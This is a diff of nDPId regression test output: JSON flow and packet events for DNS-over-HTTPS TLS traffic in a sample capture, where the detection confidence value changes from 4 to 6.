-00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946739298797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739298797,"pkt":"ZmZmZmZmRERERERECABFAAWq1TBAACsGSrWLY95ICgAAAQG70arq+8CueX\/bslAQAfmvXQAAFgMDAHoCAAB2AwOWvrm4FPC7V7PYuN+Lshod\/nezEzfqc01CK\/K8f2FrjCA2SDuI+F1GOq7qyiEw+aePhhElQVpDVzMYXSdiyok3WRMBAAAuACsAAgMEADMAJAAdACDl61zVHhMWB0BdL3ddlBFKSw5Lr9HVe6EkVLOcYVLAAxQDAwABARcDAwAksgraFQq8T84jfrRmYc223NGnVGbYG\/xj8xk4v\/EJCHm3s9w1FwMDCVmg97DgSdnn53nb0jGLv9F1+4VVO1DlJvFZ4CsfAqRyJ8a0jMqAaeRjhyCNwiDpU+6mevWKgpxWfYNjWShazkI7oaAh0ocoGs0\/Z2Mwn5ZIkIv+OuDwieAM9qTwhi+fGVM4H+qU8v3e8TtrqoxC+IgZVc8V3I+\/yPEjroPH33YYxxjju5aqvElJCjEI4urJQzXoWsAq6uQKccy5WfzKSDhJNZ8AVPquU8SpWKmo\/\/E2qD+dKLWJFgaub29gXMXjQTVzoJxdvVKG52mcWm6EXETLAVeqYVAn1jxtrmpkg13Vk85sRN2hjK5eeu4ap8rf7Lodf5tfmhv8SVfULmdGCNmmvgZMJkjmNfdKrw+XnrBHNQP2GC7kgKzhx++y9Ur+7CtcaZ0Stuv2mMWKbTn30OOZzAWiYjVeWw1PNj6IPMesZYC3bO1PwS8+BOlQEPumskRErqRklUuVJ1OXsXJn8o9P7B9r5RxumsKPZbrYuGjTJfVUwTIwaAH4g\/GODGK2+B5YB\/Z\/6LysjXxF0obthFSDlDUGBTCdDZdGFQyyl8u0xri2sr4xv5TWFpIjmyYys6SXqhW7QRXi8cM\/fGE\/JM+qZpyddar8bHdCLxGlvvPz4eCxh6lg0sugzb6K+mUo6W7gtEoQaKMIAakeMy2FOKQ3NMe5\/F+3b43gHog099YK8NKs2bvSG\/W7LXyo8PnUinj+AVLnzhrSe+qvDBw9a\/Jp7AkHbVoQwt\/EIF5\/d5w+4KMlJPMSzCUov8rfi\/CCF\/iVjvModtxk+gLz4pUaK3XRZHYtLxfH7FHcLizTZ3sSU4i+tweqvPEyxXE1E7Y+KMLDCV+QkbWkWi9gMec8ZJ3GBnIg+iSrehGCt8i8t7Lu9Wc\/2fGKgQfE9jJe\/fDA2odknuy5GV2960tQvEZAXB0c5GJBhjiPYJgYdgJ2fzUt\/xLgBoWg0zKHa\/soHWqBrLympLp+VepVMyzuzIJ6QgGVTCC1EFSrrSUxkNXDsBrwmyRP\/9FLF9pdzZACXTb6S8myrZazmvEdGdk04PjNhUiHGlUT03OYvmagf8Ya\/4VRzGGdV43OAGkQYeu0ZY\/heh9h7fucuCFB8CyBx4wy7OhYHBnDOYz2gdf\/z49N039rzJarMWXOwbROgeoXzcsBH8Uj6StZMCbM\/ZBGWByfEjHDl5w8E1dbyJx5XuC65RezHZrv05dJlBbVSEsHIMbDl7IWOUdhpeDNskZrQ+GdU5boLCtHmvrbs62KT\/zlJm2mOApHTvifRvmqKBz9tPtGNCG6XGCZWhEY3FFyS9rmcTpceJwTCfQYlzYKZslhMKd4J63ankp0RnGQLgodwM35ISK98+Kq2hNOJCTBOCxPPsHuXjZuhXdIi8QCW9VQZqww\/\/NjZPMOPy4jcZ7Tkixh7\/JmbpMEV7PnrhAXh21z+u5dLFH52pKdwGRat6A94UDcInit5rOcJtblnF8P7F8IlQqF3WFZurZBuXzllHTzbwe54UUGPwrqwyOIUkW6zUYU\/09YfhXdyYwY1MnGRAlrE9sPr4V9Vgn7ZntvhQgmKz\/jiHNHuRGaj\/PJAjEPTmoQib9SfYaA5fyYDQmsautNL\/cJ4oyfD9Jembyctib1BIp9Ramfe6PSsBXI\/0Ka52Or"} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739298533,"flow_last_seen":946739298797,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739298797,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739298533,"flow_last_seen":946739298797,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739298797,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02292{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946739298797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1408,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1408,"pkt_l4_len":1374,"thread_ts_msec":946739298797,"pkt":"ZmZmZmZmRERERERECABFAAVy1TFAACsGSuyLY95ICgAAAQG70arq+8YweX\/bslAYAfkcrQAAThemFBuD34j0ZojpR7nDk08tEILyrSrE7HS0zZ4kmhXJJxPvCajO9mPz0f1Ba7CUeJZuC\/ww3Lrn+zD28CW1o9VT3LiWNj\/tk7IhVjR3oxyzXVyp8GIUKoCq+rFgLmVNv3t4E9NSsp0vzaP0F7j0JBrlPSojRxE2tlZsJ5feSSYzKGVucsWX6pYRquGlpuPfdHODx0L8ifTKNZ7sMGSXufTYU71W7zucIJWTJn92oiP3KQmXtYYb39SlVhRkoPmox0CcWIbUIkPk1mOfiZj7ZHZGdjmSkO+stoE+mAIy1qeh6xhTg7nyjAGvTt0OEbSBbL64py0gHtL8p9MnYDH\/rEu94PzROteC\/nq08LwZZof+0aydUgoyNJpYIzziL6obgZ8r3XFfT2yBZeGRYlK+7j980Fzg4IJlxXjB\/7u4t3CFM2KzwkVTOl0QgQ2WdVMZr63UzYIuBqVeqhjDwph8EAIPfj6GHii36awX1ARUIn+i2we8pqEICyjrrtz5abqrvBqhOgUymt9799jpjN96PN89rSa+qz8R5hSWva8Z0q12NMSUqK4V32q2T+XbFuVZUlGqNPo8Q4LGFZXuYD0rXuNudeUYIvyeE2j5uqdZqZHCJg4amyAZz0RTts0c1\/NYqX2y5hPaOLvInAlZn4kgRx8P3JUIFzzVPNJJ35uuAChT5mattKXxu8qwume7sBZMgcO4xIk9V0GeDf7Q0iqbxG1cZybv7JIhiCiaIbji819I0oDOejGbK2XffVEsRj3+LURpVM8fUmFAk669Ff\/Nr+yt6tH9Ktz6qOevm0rhgviDIUwzLNJNTxk3pvt9wNVus\/LUfcLiMKspToabUtDV2KtFlgjUQBZ6M603sQeMbcyD6v4zye6TReEZisbYDNmcge+IFl+e+6gIZYcwnBnjL+IMuKODuiRDaCLQJS72LiQoTClqyWNhk8p3nZX4LJsLVi6dW6cV7ErhFynQJtxWGrvo9DrmvbJGRV80Ul449jTrc22WvgTBKnaXTTsv2pw69IL3ziatAlwA6VUKivZyuSnP\/qeqQsLIM3h1xsud7x+raSQILbisV46QaEMOKNMhEo4f9EE5vYtzwm\/ngKP6CEyyxa5eOnqoj72FpXRNgDKcpbuNQSddL+rkopq\/y8uRR5TATut5xq9zEjEQLnRu3bhaqmLH7wPAre5tejGNaBElH9ZorCCzrnrfL+5ZFV65djnMn\/burxQW9SIIOlDcRe3ddZxIf\/z8dXGWfc\/YJ2alVKWABNBLcFPeFubCnDOGFnp7WaEezUQCo1huX1d\/AR2t9ZFIxb+\/2YA0Fcu4FFOucBmHB64h34YnG1QktWj0QN6yNlW1E24ubX3xPextdjh4av9ufsqLyV+lQC34GqCFKa3D2btbNVuYlf3F\/nsdPHHCRn+svJvZKssoO39MnIg20E8\/NZSYgAW7+dMxM2JbTCDpQf718V5e42Tcc3D\/MVuwLpSLFUnGgbahF3PvczhUvo5QFk5tF0YRiH+1QJX+P4Bld+SLzREBNKhff3\/yg9uJJKca+U+6nBcDAwCBaMxAcfS4h68NX8O4\/JsJCa+QWF87yNO9r0+szCZ1TeWGW\/KMvQNFzX1G+Y2PEnQ68hI4LpJQIC4VjBdW13rCggF8QR46NY3HL4enM7oteZTlqkQvxVphVmRyDsYFcjY4u2fGUw5LFrsQktQhx2VsQTygsXipX2KtdmPdscHLlgGRFwMDADV5C7WBlZ+ocDTA\/zppOjhaktsCXwO0sG+1hu0Zi0K+GaWwxXTJGdG0p2vdDlGf4dOI0eNxTQ=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00839{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946739299058,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739299058,"pkt":"REREREREZmZmZmZmCABFAAFDIvZAAL0Gb1YKAAABi2PeSNGsAbu+7R6jIfk4pVAYAfYrngAAFgMBARYBAAESAwOSQ8JxHhGuu6wLKnGtwDfaCU9fn2zkXyLvCqG6Z1EJrSA97l3xa4NDBUHApuStJw5z26JVCZKgohlNqcovRpE62AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLTIuc2VieS5pbwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBvduxHcveHyzSwUHe1UMoR3WO30Q1YJASO6Gqd5f5rOQ=="} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299058,"flow_last_seen":946739299058,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739299058,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02367{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946739299325,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739299325,"pkt":"ZmZmZmZmRERERERECABFAAWq+oRAACsGJWGLY95ICgAAAQG70awh+Tilvu0fvlAQAflBFAAAFgMDAHoCAAB2AwO4E1L4A\/\/vaa3qFy7zGtkSllYVpFARFReL8E9wQ5edfiA97l3xa4NDBUHApuStJw5z26JVCZKgohlNqcovRpE62BMBAAAuACsAAgMEADMAJAAdACC6hi7aKoaulrg0kHVy9iX3JtIXsjOWFqMY4JtXoR3ZFBQDAwABARcDAwAkVn7ui3VtyEjBPho8csX4cWU91LDHlldd37yMDuMkm1WrNSA\/FwMDCVkNxERPpxFp1hU3MTygH94nI+uO3MFA6Pgc7Cjgsqv9R94L1LzqnlTJ9qM2GdC3DoaCFMZy2rvnd3TUb44js1wH\/ZjR\/tueYjuCchsydXsjOJIItHXpv6rNdoQc5GxilmSN3ZLV0BdssW6zhxxgQaE3FYajxWXTTfgzUzOS+6W++jmvd1q00zg+8Q0qSguzfNUtyikLzjXqF591w71tmw1RwueDWDRqOR8D9ArOOASC\/gfHKocbf3MYoPn\/L3+LeyjDo7Dan2mPuEUKlItjagedNzassvjfnCKDfWzjTYX1Oj074zzZKYUi326SCBVqvZ4BTAJFklyVRE2\/7w5a9Hu3TkucSU4uD6YDgHvYuwr1PUeuJlpLcTtMIe6KqdQO6VhykmmEfKtsuoqKDau0V16KSQWM2aCvsVesKQ3DSQJg5rL5yIwj9vpyWnaHxDEgfEIDmYjy\/Axgsm7vfVWFF3Jrfc1xzCpgVx2Wzxxl\/maZOzNTYwZUTU3hLDZjHHXTyifvb45snBjXrLw3E9kNt6T2lmZ7d2lzBq35OqiFyiqDdqg5nN+wvKg6FFTseFXwn\/Cnava4JqwJeCYBLZwtvjbxpmY\/Z7bzc6mZPg2Sh+dbDSkCl3bi0C7OGN4lTKk6SakWyrfvl60M9dBFHVDrzgKu7xbDvPEvSNcZq2Dx1QXy2oMyLZnD977uZ9nLe2MaP79hLJNgy4v+jriXtA5fuVRTABndd0eLGpCNoQRcyQEasclWVE0X3djEYjD5W2s+8ID+COBoWOoyP\/WAq9bDmdFuLbZL5YcQMg6OEX37+6VcGXh24mzLjiWqRW2SXZBECP5e9Kp+qBc4nsLJy+\/cCFFzWnnOIeDNkPzITjeYYG62LLpDcjihxenHjNkU8aI6W9z7HJRAKXj15JybI7ZavgKdsyBJSz8Rv17E9WgwJgE24FqtNa6LcXPjCIVJ4JA\/FRIvlJbq2\/PV2grzaPllz7EIQXESn4AAbsSK6v\/afg1rifhsSGv2yYjxwtRB5P9D+FT0dFjO2m9zDYEYLvFPNAv2\/uEF0d+ML9zrDfaDdz6z+wzZI7tOXb+ZgoELySqXWnZpXCKfAbAaRdkBWG9n\/7DEkPQfGc3BRuxecF3gZRN5TjRNnS3L\/z3Mjd0kgq5NvuPBzwr++r8PkzDyv4SrhrEho0ZXiTGQlO7AUNavDHJ2E6WcvB6wH6w+nDu+LafkJwVBrA3g2ry2AgWQYQlCtuH3p4tS5epl0vy3sOsnzjbAIulHq4VIitq5pO3s+sczN2QL3hoGMgZmvfNYCCppei2sMRM3JeTXdDamDavAss5ffhc7o9sFzFOhYwBHF3K+RDvF+\/0hY+kvloFXPT7w5qyKb029c\/+Vu3kK8iCqQMpkd\/Y7fPVoDJRSebia6NkOtp0QF10Wqdh2s0768F9ux8l3ns6Ahcvm\/CEcnhylTvqF1H8nFLoIPnLNfkqliriwfEB7qB8aB8psWMvXozj1u+xw79vKaBVDClx5kPg1ndY1UZCkXuVmLOZwvxWWc0tuTJcMVug1lNwCPKGUEoQ6IRWLIe8NCbqmkI6bW\/5Xu20soyB9iTbKgsh2xLBekpYgVl8gT8VGJflOjydyD64I9+T\/dXz5zy\/0oPQP9q2vSa5j"} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739299058,"flow_last_seen":946739299325,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739299325,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739299058,"flow_last_seen":946739299325,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1693,"flow_avg_l4_payload_len":846,"midstream":1,"thread_ts_msec":946739299325,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 02291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946739299325,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1406,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1406,"pkt_l4_len":1372,"thread_ts_msec":946739299325,"pkt":"ZmZmZmZmRERERERECABFAAVw+oVAACsGJZqLY95ICgAAAQG70awh+T4nvu0fvlAYAfmmIAAAiW51QuqEfobYElojzNdmal3NmvuNd\/aotOFuZKIcd+01MY62EHH7E56\/oxK0qr9J58d7Jfc491vr3AkBsKJZSE5EN1LMlpXioNrse464nnbj5nYCt1y8iJtaYVHfHT9x8ujbG\/T2N6ZekRm+ONP3O7xw3rubgw7ubQJF\/KHEiRVFPrbIwq5RI7VTRdfrd3b9Fc\/71kitl8ImBckYsh09FSa2nRQrqALNG43BNA+FPS+D4bALfGJGztFq32s2D2cWRj2vno7VjQQWYQsz+9R40cUHWMbbW0anf7aLopYHYwhAUnxfUJyLSGv\/hcuY1JoGSes4gPPm0w\/KvSPUfmH1XOcuJRdoXdElY5F\/m9je9IUq8euoPyf0PXU\/w6wn+q9PJNYNblwNWPVkVSF6bp87Ycrz+bZvhmrk3ipYYu58\/qf3ItMXsHiYNDHVbyhTOrrT84X2uXkA5ajgilxkHZCWJdDIvRFwT++59P5vI4krRFU0SPX1eygQdMslXLsxvfqQATVp3sK76bt8qHa8rMRVLCfPA3UPe8Z9q\/JNBVvEPCwFBWQICqqCApD7kqMSclaEy89K83LVugXlNfNOargw6YlUR36QNrsco2xSkkpbYZSag+guZDt8NaBOAQqx6Dtx5yS9ZeM2TaZ4Tva3cH5WwTw3nwMfyBrZkmKclliFlyL+l3\/Ft\/1cAhtU5U7a4LgYVbdqsQxRVbeUPAwUZ68y2BGyj5Xg8Mtci4mPsgh+bnyNL5K5y9jSltRS79PDJA87B7hqXTRUrELkxjFWaMPAzghsENt\/UjelVjAgSWUxzpqxPV+2hED3HVp9LJOBmZIcSEVN1eWHazkX+mtW2m+0GAsZaxamutLzgJh\/DRJa7Jw23fjV9PCXnj9MWSdJstPENtBI0OVh7PH0+uAGt1zxMdGzUgBU2QlNOO7S4UuYD0Y26DtfRFNsa3yyMMJMA4d1B+99D0rLBp+YTr6CIQlSGW7\/MY0mGzKXnXLKEBMjIoE76aJQADNrOQ1pUsHUbMNYSxpurIgJZbgBG3OALLoptMECW3PsCTpgXkQ2OmVE11D882PmbdA0f4acC7LQATIGoxF7ZIVK6E9Vi5\/LR0AueJFdtzLq+oc1+GpS8l4A7KvQzJjHl8BFVtlJFp5Ft91g8c86AHAIukg5AmfSwO3K4Rq0SXUs8KcP29aiI1bA7\/K0iAEMbAiDcRNwXEEo+uNEfshUZQDIyZoBHdLzMTL\/2s9ouLF90mtZTkbub4ko0oHCp0UBuhgnfDbrA69yTnP91yV8UR8xswBSaiV12vmMHeXGGKIJ6dQbgPNn5OzZbyefQz5\/sH6dHxYbcGGfd+8wSxfEi7DokbKnmTmetH85RkCusy06sJkhFgf9bhlEmk63Cet5cz7Z7ea9PrtiS\/xOPZoAmLR8AcrBNB\/tHpNVlFcTM+gO6pHXXYSwt1o+rdQxZT4lFn7kVxmARBzEGQB8TIogOkRi0YtdMrX\/cAGbQWx0wllwfDL\/JIISbxKwUNTT45zepGk3OVcnv0694KsAM6Pujlm7XvrZ+hcDAwB\/JlZfTL2CfKHweE8ivDA\/8Dj4s9MhpgBrmwa3P4sMMqXQFKgI6jQB7iGhbQGftnSVKI+QCxWleTjngiVWQbRq4xwswRPPuCr\/EteohSIpdjvjIjT4EQlykWjN3TxUSVyvVSA8Rp0nUkHXzRzNgRwt1EKIchjIYekan95L5wPtZxcDAwA1P8zjtyfqh9OaAN1qf+msLEHbyvTYhKC4e6LNeICCaSA3aHIsCQ1pZdcK52vQiTVTlBfFsLw="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00864{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946739304432,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":352,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":352,"pkt_l4_len":318,"thread_ts_msec":946739304432,"pkt":"REREREREZmZmZmZmCABFAAFSUVZAAL0GFwkKAAABuV\/aKsW2AbtqjRCaK20m8FAYAfZViwAAFgMBASUBAAEhAwPqrEqAFBwbSYnmd5FQ4vhXWCXQOM7WSA+ydz5Uq2T7jCDruFBRjE\/ZRtIlov08nzXX8Izc\/f7Ut++FjeF3CgO25wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACyAAAAIQAfAAAcZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDBZSA439npt9wjB\/Qij4hgUYqoHU3i8\/GsiDYDjRoMEQ=="} -00917{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304432,"flow_last_seen":946739304432,"flow_idle_time":7580000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":946739304432,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.digitale-gesellschaft.ch","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 